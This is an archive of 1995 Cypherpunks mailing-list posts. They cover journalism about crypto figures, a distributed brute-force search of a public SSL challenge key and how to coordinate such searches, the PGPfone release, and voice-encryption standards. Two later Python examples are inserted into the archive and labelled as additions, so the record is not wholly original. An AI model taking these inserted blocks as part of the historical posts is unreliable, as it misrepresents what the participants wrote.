books on high tech and science, and asked him not to do the same with me.
There were three books out at that time (late 1992) on "complexity" and/or
"artificial life": Levy's "Artificial Life," Mitchell Waldrop's
"Complexity," and one by Lewin (sp?), which I have someplace but can't find
right now. All were remarkably similar, with this as a typical personality
passage:

(opened at random)

"When Langton finally made it to the University of Arizona campus in Tucson
in the fall of 1976, he was able to hobble around with the aid of a cane,
although there were still more operations to come on his knee and right
shoulder..."

(Waldrop, p. 211)

And so on, ad nauseam. Chris Langton, a very fine fellow whom I met at the
first Artificial Life conference, back in 1987 (before it got so trendy, so
high tech chic), has been "profiled" in dozens of books, ad nauseam. Like
Zimmermann, his childhood and exploits with hang gliders have been told
over and over again, often substituting for solid explanations of the
important ideas.

I haven't seen Cassidy's story, of course, nor have I seen Levy's book
(forthcoming, I think), so perhaps they have moved away from the
personality profile approach. Editors may demand more personality stuff,
but we should just say No. (Or not get interviewed, which is fine. I've
turned down three interviews in the last year, mostly because I couldn't
say what would be gained. Too many damned magazines anyway! What's the
point of being the "freak of the week"--to use Dave Mandl's term--in some
obscure issue of "Access" or "Spin" or "Raygun," when the issues are just
skimmed by the Generation Xers to whom they are targeted?)

A wonderful, wonderful book which--I think--set the stage for modern
personality profile journalism, at least in high tech, was Tracy Kidder's
"The Soul of a New Machine." It came out in 1981 and was a best-seller and
award-winner, recounting in great detail the development of the Data
General answer to the VAX. Wonderful stuff about "shootouts at HoJos,"
about how "if you succeed you get to do it again," and how "Wests hire
Wests." The personal stuff was fascinating, and lent an air of a group
biography to the book. Highly recommended.

I think this has become one of the main models for modern high tech
journalists to emulate. However, few have the flair that Kidder had (Levy
does, in my opinion), and many misapply the Kidder model to stories that
basically don't have the drama that the Kidder story did. For example,
artificial life is interesting stuff, but it's hard to get any high stakes
drama out of it, except by "manufacturing drama" (to borrow from Chomsky).

John Markoff, another writer whom I respect a great deal, is doing a
screenplay (or story treatment, so I have heard) about the Mitnick affair.
Lots of Hollywood stuff is already there: Shimomura, Mitnick, high tech war
rooms tracking Mitnick's movements, a raid by the authorities, even a
Nevada hooker who has it in for Shimomura (read the personality piece by
Katie Hafner, Markoff's wife (I think), in a recent issue of "Esquire"). If
he hits the big time, even more so than he's already hit, I expect even
more journalists and writers will be sniffing around. "Cypherpunks--The
Movie"?

The modern crypto issue has some real drama, of course, but I'm not sure I
want to read several pages on Dorothy Denning's childhood, or why Stu Baker
had to miss Woodstock. I hope Levy is not just Kiddering.

Anyway, enough of my rant on journalism today. I mean no offense to
journalists, who are probably just doing their job. But publicity can be
seductive, and sometimes it's better to just take a Zen approach of
avoiding the empty furor.

--Tim May, who lives in "Digital Walden," 90 miles south of San Francisco,
and who thus finds it easy to turn down requests for interviews in SF.



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 04:08:11 PDT
To: CYPHERPUNKS@toad.com
Subject: Thanks for all your efforts ... you can stop now ...
Message-ID: <"swan.cl.cam.:131320:950826110802"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


The actual attempt is now over. See http://www.brute.cam.ac.uk/brute/
(which is being updated from time to time). Thanks for your patience.
Could people running old versions please kill any looping clients.

Anyone wanting to try to sort out any remaining problems (NB: the load has
dropped, so only the "hard faults" will remain) should contact me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 04:09:19 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: SSL CHALLENGE: I told you so....
In-Reply-To: <8AFD417.000300036F.uuout@famend.com>
Message-ID: <"swan.cl.cam.:131630:950826110839"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>   Geez. It would be better not to even have a damned keyserver at all,
> but to just have everybody pick a random start location, than to do it
> this way.

Define "better" ...

See my earlier post on what this project was about ...
(1) and (2) -- (3) is later 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Sat, 26 Aug 95 03:34:18 PDT
To: cypherpunks@toad.com
Subject: SSL trouble
Message-ID: <9508261034.AA15406@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


Let us call "sequential search" an algorithm that remembers which keys were
tried and avoids trying them again, and "random search" an algorithm that
just tries keys at random without bothering to check.
 
The sequential search has the following problems:
 
1. The server is badly overloaded.
It is vulnerable to a variety of active attacks:
2. "result hoarding" attacks: finding the result and reporting it "not found".
3. "dilution" attack: allocating some search space and not sweeping it.
4. plain old "denial of service" attack: deliberately overloading the server
   with bogus communications.
5. And of course all of the above in their "buggy software or hardware"
   versions.
 
The random search has none of them:
attacks 1 and 4: there is no server to overload
attacks 2 and 3 are no worse than simply refusing to participate in the search,
because the rest of the computation is independent of what any one party is
doing.
 
The main drawback of the random search is that the expected running "time" is
the size of the key space instead of half the size for the sequential search
("time" here is the number of keys to try before finding the right one).
 
In practice, because of server overload, our machines don't seem to be working
more than half the time, so the random search could be actually faster than
the sequential search.  Even if it isn't, I think doing twice as much work
is a good trade-off for protection against all attacks, and no more network
or server problems, and no more allocation hassles for off-line users.
 
Four more remarks:
* I get the factor of two by assuming that the algorithm is "pick a segment at
  random, look for the key in it, pick a new segment at random, and so on".
  I suspect that sequential searching from a random starting point would be
  much worse in the case of many independent searchers.
* I hope there's no bug in my math.
* Another drawback is that the worst-case running time is infinite (but it is
  infinitely unlikely).
* Of course, we need a good PRNG, but that's essentially what RC4 is.

In conclusion, I think random searching is the way to go.  It's even better
than Monty's pre-allocation with quad-coverage.
 
-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sat, 26 Aug 95 10:10:32 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <"swan.cl.cam.:131320:950826110802"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950826130755.29279A-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Piete Brooks wrote:

> The actual attempt is now over. See http://www.brute.cam.ac.uk/brute/
> (which is being updated from time to time). Thanks for your patience.
> Could people running old versions please kill any looping clients.

Thanks to Piete and the rest of the brute crew for getting this 
experiment together!

I hope this will not be the end of our distributed brute-forcing runs, 
but only the beginning!  We should be able to take what we have learned 
from this run and put together an even smoother run for the next challenge.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 10:59:28 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <9508261758.AA25920@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



There are more effective solutions than simple random search, these have been 
known in the distributed processing arena for years.

What you effectively have is a farmed solution to a problem with a high degree 
of trivial parallelism. Farms always suffer from the server bottleneck problem. 
The alternative is to use a multifarm, it's a bit complicated to explain but the 
essence is that you distribute the farming mechanism. The most extreme example 
of this is to have every slave also act as a master for some part of the problem. 
Since the bandwidth/processing ratio is unfavourable it would be better to have a 
small but non trivial (5-10) number of master controllers.


The basic principles are to leverage pipelined parallelism, a slave does not 
simply ask for a chunk of keyspace, process it, return results and ask for the 
next chunk. Instead overlap work packages, give them more than one to work at at 
once so that the system does not suspend waiting on the server.

Size the chunks adaptively, the more keyspace a processor works through the more 
packets it is given at once.

Use integrity checks to ensure that the slaves are acting properly. One method of 
doing this is to keep secret part of the known plaintext (say 16 bits). A slave 
is required to report _all_ matches in the range to the master. Slaves who report 
a statistically low number of matches may be considered suspicious. It is a 
simple matter to allocate part of that keyspace to another processor for a 
double-check.

	[It's so obvious I'll apply for a patent on that technique]

Another useful technique is to require the slave to checksum some collateral 
result from the calculation mix. Then if it's simply braindead software it can be 
detected.

When running a multi-master farm it is important to realise that the slaves serve 
all the masters, not just a single one. Masters can distribute work chunks 
amongst themselves in larger chunks, as chunks are completed this is communicated 
to the other workers.

If we used the Web as a substrate for this work the control software could then 
be used for other related tasks requiring large scale parallel processing on 
networked workstations.  This was one of the original applications I looked at 
back in 1992 when I was doing an awful lot of this type of work.


		Phill Hallam-Baker
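
The integrity check proposed in the message above, as an added example that is not part of the original post or of the brute project's code: the master withholds 16 check bits, workers must report every key that matches the public bits, and the master flags low counts, double-checks a sub-range and confirms the real key itself. The SHA-256 `trial` function, the 8 public bits, the chunk size and the key value are constructed stand-ins, and all names are hypothetical.

```python
import hashlib
import math

PUBLIC_BITS = 8    # check bits handed to every worker (constructed value)
SECRET_BITS = 16   # check bits only the master keeps ("say 16 bits")
CHUNK = 1 << 16    # keys per allocated chunk (constructed value)
REAL_KEY = 0xBEEF  # constructed "right answer", located inside the chunk


def trial(key):
    """Stand-in for 'decrypt with `key` and read the known-plaintext bits'.

    A constructed toy function (SHA-256 of the key index), not a real cipher.
    Returns (public_bits, secret_bits) of a 24-bit check value.
    """
    digest = hashlib.sha256(key.to_bytes(8, "big")).digest()
    value = int.from_bytes(digest[:(PUBLIC_BITS + SECRET_BITS) // 8], "big")
    return value & ((1 << PUBLIC_BITS) - 1), value >> PUBLIC_BITS


def sweep(start, stop, public):
    """Honest worker: report every key whose public check bits match."""
    return [k for k in range(start, stop) if trial(k)[0] == public]


def lazy_sweep(start, stop, public):
    """Buggy or dishonest worker: claims the chunk, sweeps only a quarter."""
    return sweep(start, start + (stop - start) // 4, public)


class Master:
    def __init__(self, real_key):
        # In the toy the target check value is derived from a constructed key;
        # a real master would take it from the known plaintext.
        self.public, self._secret = trial(real_key)

    def verified(self, start, stop, reported):
        """Keep only in-range reports that really match the public bits,
        so a worker cannot pad its count with made-up keys."""
        return {k for k in reported
                if start <= k < stop and trial(k)[0] == self.public}

    def suspicious(self, start, stop, reported, sigmas=5.0):
        """Flag a report whose match count is statistically too low.
        Matches are modelled as Binomial(n, 2**-PUBLIC_BITS)."""
        n, p = stop - start, 1 / (1 << PUBLIC_BITS)
        mean, sd = n * p, math.sqrt(n * p * (1 - p))
        return len(self.verified(start, stop, reported)) < mean - sigmas * sd

    def double_check(self, start, stop, reported):
        """Re-sweep a sub-range; return matches the worker failed to report."""
        return sorted(set(sweep(start, stop, self.public)) - set(reported))

    def confirm(self, reported):
        """Only the master can tell which reported candidate is the real key."""
        return [k for k in reported if trial(k)[1] == self._secret]


if __name__ == "__main__":
    master = Master(REAL_KEY)
    for name, worker in (("honest", sweep), ("lazy", lazy_sweep)):
        report = worker(0, CHUNK, master.public)
        print(name,
              "matches:", len(report),
              "suspicious:", master.suspicious(0, CHUNK, report),
              "missed in re-swept range:",
              len(master.double_check(0xB000, 0xC000, report)),
              "confirmed:", [hex(k) for k in master.confirm(report)])
```

Because the worker never sees the withheld bits, it cannot tell which of its reported candidates is the real key, which is also the objection raised in the replies from people who want to search independently.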






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 26 Aug 95 14:29:54 PDT
To: cypherpunks@toad.com
Subject: PGPfone 1.0b4 Test at Party Tonight
Message-ID: <ac64b983000210044ade@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Talk about synchronicity!

Three years ago, as we met for our first meeting (before we had been dubbed
"Cypherpunks"), PGP 2.0 had just appeared a day or two earlier. Arthur
Abraham prepared copies on floppies (I know, I know, not fully secure :-}),
and we all got copies at that first meeting.

Well, PGPfone was released yesterday, and the release date is officially 25
August. And I have it, and my Cypherpunks Santa Cruz party/meeting is
tonight.

It runs on Macintoshes, so far, and I got it downloaded (from
"alt.anonymous.messages," ironically, as the MIT site would not let me have
it, claiming they couldn't verify that "got.net" was a kosher site....so,
"the street" gave it to me, without any of those messy restrictions on who
I can give it to, etc.:-}). Quite an example of synchronicity, that it just
appeared, that the Mac is its first implementation platform, and that
today's my party.

It seems to work, at least in voice mode, though I need to read up on
set-ups for my sound input and output (fairly standard for the Mac, but
always a chance of some misconfiguration). I have a PowerMac 7100av, goosed
up to 84 MHz, so power should not be a problem.

What would really be nice is to have someone to test this with. Hence this
message. If you are willing to be a test partner, especially at tonight's
Cypherpunks Santa Cruz party, send me a message with your phone number. And
any tips you've found are necessary to make it work.

(I already realized I had to get the latest Threads Manager, and did so via
Apple's Web site.)

The party starts around 6 p.m., PDT. A call around 8-10 p.m. PDT would be
nice. I can call you, or vice versa, depending.

Three cheers for synchronicity!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Sat, 26 Aug 95 06:05:14 PDT
To: rsnyder@janet.advsys.com (Bob Snyder)
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <199508261129.HAA22154@janet.advsys.com>
Message-ID: <m0smKvJ-000PZgC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 12:26:09 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: PGP and AIX
Message-ID: <Pine.SOL.3.91.950826152246.28507L-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Has anyone sucessfully compiled PGP with AIX v.4 on an IBM RS6000?

If so, please mail me, as I'm trying to install it sucessfully.

Thanks!
Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMD90vL5ALmeTVXAJAQFY/wL/eMTW42xlF7BGJ8btfb4VCHvZcRFkTTZa
vTAiCRRdlXsKsdLRtxmE+Bf2aRVsiXg1xQ3YVQNewcX42PLET+GGqmIo6u2jXuCn
bfslubIHAr9InfPMV+/tOvGhgAWP3nTr
=8qXL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 26 Aug 95 15:28:16 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: Modern Journalism (was: All about Bernstein)
In-Reply-To: <199508262121.RAA24748@zork.tiac.net>
Message-ID: <Pine.SUN.3.91.950826151407.6069A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 26 Aug 1995, steven ryan wrote:

> You may not want to read those stories any more because you know all the
> details. But a puffed up cover story on Phil Z in People magazine would be
> one of the best things that could happen. . . .

I concur with Steven, but only so long as the piece is more or
less sympathetic.  I think Phil has gotten an amazing amount of
positive press.  In the scheme of things, this may prove to be 
more beneficial for the Cypherpunkish agendas than even his 
creation of PGP.  Phil's image--cryptographer as puppy-dog--will 
help us a lot more than the "evil kiddieporn/terrorist/hacker" 
image the FBI and Dianne Feinstein would prefer the public to see.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Sat, 26 Aug 95 16:30:34 PDT
Subject: Re: Article in Time Magazine
In-Reply-To: <9508250941.AA00683@elysion.iaks.ira.uka.de>
Message-ID: <41nhbe$2jb@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


danisch@ira.uka.de (Hadmut Danisch) wrote:


>> All the more reason to use Linux or FreeBSD - an OS you have the source for,
>> on hardware that you can examine.


>How would you want to examine a pentium processor?

>Just an idea:

>Take the block move instructions and attach a little state machine.
>If a certain sequence of bytes is detected, a fuse somewhere on the chip
>is burned and the processor could switch irreversibly into a mode where
>it does partially incorrect calculations. Send someone an email, an IP packet
>or an ethernet packet and you can expect the packet to be moved by a
>block move command. 


>Hadmut
> 

Err, ummm -- what I meant is that _you_ are the one that purchases,
installs, and decides on the processor, motherboard, RAM and accessories
(like a PCI video card, SCSI controller, etc).   If you want to go all the
way to the microcode on the chip, then that's another thing altogether.  I
was mentioning microcode in the IBM way, being the thing you load on the IPL
startup disk for a naked machine, not the embedded circuitry.  

Short of having a degree in Electronics Engineering, along with a scanning
electron microscope (for viewing the chip masks) and a whole lot of
experience with the chip in question, you are stuck with a trust of the chip
manufacturer.  No disagreement there.  But, should there be a malicious
"bug" in a chip, especially in the PC world, it would show up sooner or
later (as shown by the Pentium FP error).  All the more reason to NOT be the
first one on the block to upgrade (I still have Xenix on a 286 for my kid,
Linux up on my old 386DX40, and my 486(NT) is just fine.  I only recently
acquired my first Pentium now that they are cheap enough for a P5-90).

Regards

Buzz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 14:22:25 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508262118.RAA15661@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> Use integrity checks to ensure that the slaves are acting
> properly. One method of doing this is to keep secret part of
> the known plaintext (say 16 bits). A slave is required to
> report _all_ matches in the range to the master. Slaves who
> report a statistically low number of matches may be considered
> suspicious. It is a simple matter to allocate part of that
> keyspace to another processor for a double-check.

  Please don't do anything like this.  This will prevent people
like me who prefer the "random" method from participating.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sat, 26 Aug 95 14:22:12 PDT
To: cypherpunks@toad.com
Subject: Re: Modern Journalism (was: All about Bernstein)
Message-ID: <199508262121.RAA24748@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I want to puhhff you up  -- SNL?

>We need to "Just say No!" to journalists asking for "more personal details"
>to spice up their stories... 
>I no longer read the many puff pieces on Phil Zimmermann, for example, as
>they all are seemingly in the same format: huge closeup photos of Phil's...

You may not want to read those stories any more because you know all the
details. But a puffed up cover story on Phil Z in People magazine would be
one of the best things that could happen. Some actresses feel that any
publicity is better than no publicity and they may be right. Given that we
are not going to get many in depth technical articles in the mainstream
press, puff pieces are better than nothing.

In the last month on two different occasions I have been in casual
conversations at work when the subject of PGP and cryptography came up based
on articles in the local media. I was able to answer the questions and
explain in detail the benefits of PGP and as well give out a disk loaded
with the program for them to try. If the puff pieces weren't read by these
people the subject would not have come up and I wouldn't have been likely to
have had the opportunity to get these people interested in using PGP.

Given that the average person still knows nothing of cypherpunk technology
and issues and probably wouldn't mind if it was all outlawed in the name of
national security, anything that keeps the topic in the public's eye is good.
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 09:40:40 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <"swan.cl.cam.:234280:950826164020"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 1. The server is badly overloaded.

Let's not get implementations confused with algorithms ...
We were using ALPHA code when we started ....

With BETA clients, a hierarchy and select/poll loops, I reckon a server would 
stand a chance.

> It is vulnerable to a variety of active attacks:
> 2. "result hoarding" attacks: finding the result and reporting it "not found".

Sure.

> 3. "dilution" attack: allocating some search space and not sweeping it.

Un ACKed space is re-allocated after the first scan has completed.

> 4. plain old "denial of service" attack: deliberately overloading the server
>    with bogus communications.

Few systems can resist such an attack !

> 5. And of course all of the above in their "buggy software or hardware"
>    versions.

... causing them ... yes -- especially (1) !!

> The random search has none of them:
> attacks 1 and 4: there is no server to overload

(4) is still applicable isn't it ?
What tells people to stop, or do they go on for ever ?

> attacks 2 and 3 are no worse than simply refusing to participate in the
> search, because the rest of the computation is independent of what any one
> party is doing.

(3) is just the same for the server -- it re-allocates.
(4) would require a restart :-(

> The main drawback of the random search is that the expected running "time" is
> the size of the key space instead of half the size for the sequential search
> ("time" here is the number of keys to try before finding the right one).

where "expected" is some loose average .....

My stats is *very* rusty, but I'd have thought it would be somewhat less than 
twice a linear search ...
However, I agree that as a ballpark figure, yes: it would be somewhere between 
N/2 and N ...

> In practice, because of server overload, our machines don't seem to be working
> more than half the time, so the random search could be actually faster than
> the sequential search.

IMPLEMENTATION !

> Even if it isn't, I think doing twice as much work
> is a good trade-off for protection against all attacks, and no more network
> or server problems, and no more allocation hassles for off-line users.

random probing does indeed have its merits.

Personally I'd go for a scheme whereby on finishing a random search, the 
client multicast a PGP signed message (there would be a WWW/email/telnet/... 
interface which would multicast for our non-connected members) allowing 
interested parties
1) to gather stats as to what actually happened
2) maps of "unsearched" areas to be built by anyone wanting to fill gaps
3) the "big boys" could learn to trust each other and use (2).
4) when all notified keys are tried, go in to killer mode, and try to find
   who is untrustworthy.  Someone can only try it once, and getting a "big boy"
   tag takes a while, and a lot of CPU cycles !

>  I suspect that sequential searching from a random starting point would be
>   much worse in the case of many independent searchers.

Convince me (please) ....

What size "chunks" should be scanned ?

> * Another drawback is that the worst-case running time is infinite (but it is
>   infinitely unlikely).

See above ... the big boys will do it eventually ...

> In conclusion, I think random searching is the way to go.

It has its advantages -- yes. Did you use it for Hal1 ?  :-))
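
The running-time claims debated in Damien Doligez's message and in the reply above, worked through as an added example (not code from either poster): exact expected rounds for a coordinated sweep, for random segments chosen with replacement, and for sequential sweeps from random starting points, plus a seeded simulation of the last two. It assumes equal-speed searchers working in lock-step rounds and a uniformly placed key; all function names are hypothetical.

```python
import random
from fractions import Fraction


def coordinated_rounds(segments, searchers=1):
    """Server hands out every segment exactly once, `searchers` per round.
    The key's segment is uniform over positions 1..S and is swept in
    round ceil(position / searchers)."""
    total = sum(-(-pos // searchers) for pos in range(1, segments + 1))
    return Fraction(total, segments)


def random_segment_rounds(segments, searchers=1):
    """No server: each round every searcher picks a segment uniformly at
    random, with replacement. Rounds until the first hit are geometric."""
    p_hit = 1 - (1 - Fraction(1, segments)) ** searchers
    return 1 / p_hit


def random_start_rounds(segments, searchers=1):
    """No server: each searcher picks one random start, then sweeps
    sequentially with wrap-around. P(rounds > t) = ((S - t) / S) ** m,
    and the expectation is the sum of those tail probabilities."""
    return sum(Fraction(j, segments) ** searchers
               for j in range(1, segments + 1))


def simulate(strategy, segments, searchers, trials=20000, seed=1995):
    """Monte Carlo estimate of the mean number of rounds for the two
    server-less strategies ('random_segment' or 'random_start')."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        key = rng.randrange(segments)
        if strategy == "random_segment":
            rounds = 1
            # Keep going while no searcher picked the key's segment.
            while all(rng.randrange(segments) != key
                      for _ in range(searchers)):
                rounds += 1
        elif strategy == "random_start":
            starts = [rng.randrange(segments) for _ in range(searchers)]
            rounds = 1 + min((key - s) % segments for s in starts)
        else:
            raise ValueError(strategy)
        total += rounds
    return total / trials


if __name__ == "__main__":
    S = 1024  # number of segments (constructed value)
    for m in (1, 32):
        print(f"S={S} searchers={m}")
        print("  coordinated    :", float(coordinated_rounds(S, m)))
        print("  random segments:", float(random_segment_rounds(S, m)))
        print("  random starts  :", float(random_start_rounds(S, m)))
    print("simulated, S=64 m=4:",
          simulate("random_segment", 64, 4),
          simulate("random_start", 64, 4))
```

With one searcher the random-segment search expects S rounds against (S+1)/2 for the coordinated sweep, the factor of two in the original message. Under these assumptions the random-start sweep averages slightly fewer rounds than random segments and never needs more than S.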





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 26 Aug 95 10:03:49 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
Message-ID: <199508261703.AA29706@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bob Snyder sez:
[..]
: > likely to be all over the (non-US-and-Canada) place before the 
: > weekend is over. 

: But if people get it from MIT directly, then MIT is violating ITAR/DTR, and 
: its lawyers would be justified in shutting things down.  If it's pulled down 
: by a US citizen, and then sent out, I don't see how MIT could be held 
: responsible for it.

It's already posted to alt.anonymous.messages, alt.fan.david-sternlight
and alt.binaries.warez.mac .

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 26 Aug 95 16:31:07 PDT
To: cypherpunks@toad.com
Subject: proliferation of voicesystems
Message-ID: <199508262330.TAA08738@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  It's really great that there are all these voice transmission/encryption
programs out there, the problem is, none of them will talk to each other.
If I have a unix box, I have to use product X, if I have a PC, product Y,
and a Mac, product Z, and X,Y, and Z all speak different protocols. The
issue is more frustrating with web clients. I like to use Netscape, but
if I want to view RealAudio, I have to switch to Windows, etc. Rather 
than have one "successful" product set a de facto standard and lock the 
rest of the market into one algorithm, cypherpunks who are working on
voice products should collaborate to produce an open standard, which
specifies base level functionality, and drop in algorithm improvements.
Perhaps even video should be considered as that too will eventually be
a reality. Sooner or later, there must be a shakeout and a 
"standard" (de facto) will emerge. The question is, do you want this to be
an extensible open standard that can cope with changing hardware and
network capability, or do you want, say, InternetPhone, to win
and set the standard by sheer market share like Netscape is doing 
now and like Microsoft has been doing?

Just something to consider.

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 16:36:41 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508262332.TAA26817@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


>>   Please don't do anything like this.  This will prevent
>> people like me who prefer the "random" method from
>> participating.

> You can't use the random method if the CRACK is using a
> sequential search. It just doesn't fit!

  Hehe...  I've always been a bit of a misfit.

> You can't ACK something which has not been allocated to you.

  But I could announce it on the list.

> However, if a CRACK were to be using random, the above would
> be useful as a "progress report" as the rate of reports
> indicates how well the search is going.

  I don't want to make progress reports.

> It would also allow more equal sharing out of the prize money,
> as on average 2**15 "possible" keys would be found, and the
> first finder of each would receive a fraction of the prize.

  Well, if someone starts talking real money, I might change my
tune.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 19:16:35 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508270132.VAA05017@interport.net>
MIME-Version: 1.0
Content-Type: text/plain




>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be
>> considered suspicious. It is a simple matter to allocate part
>> of that keyspace to another processor for a double-check.

>   Please don't do anything like this.  This will prevent
> people like me who prefer the "random" method from
> participating.

> Not true, it would be open for anybody to sweep a random space
> and report the results.

  I don't get it.  If the challenge is partly secret, how will I
know if I crack the code?

> The only difference would be that the sweeper who discovered
> the real key would not be the first to know of a break

  ?  Sorry, the terminology seems to be over my head here.

> and that it would not be possible to attack the crack through
> dishonestly claiming to have swept space that hadn't been.

  That is one reason I like the random method.

> You can't ACK something which has not been allocated to you.

>>  But I could announce it on the list.

  A clarification: my "it" above refers to a successful cracking
of the code.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 17:12:37 PDT
To: Will French <cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <199508262118.RAA15661@interport.net>
Message-ID: <9508270011.AA25215@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be considered
>> suspicious. It is a simple matter to allocate part of that
>> keyspace to another processor for a double-check.

>  Please don't do anything like this.  This will prevent people
>like me who prefer the "random" method from participating.

Not true, it would be open for anybody to sweep a random space and report the 
results. The only difference would be that the sweeper who discovered the real 
key would not be the first to know of a break and that it would not be possible 
to attack the crack through dishonestly claiming to have swept space that hadn't 
been.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@whip.ugcs.caltech.edu ((me))
Date: Sat, 26 Aug 95 13:57:32 PDT
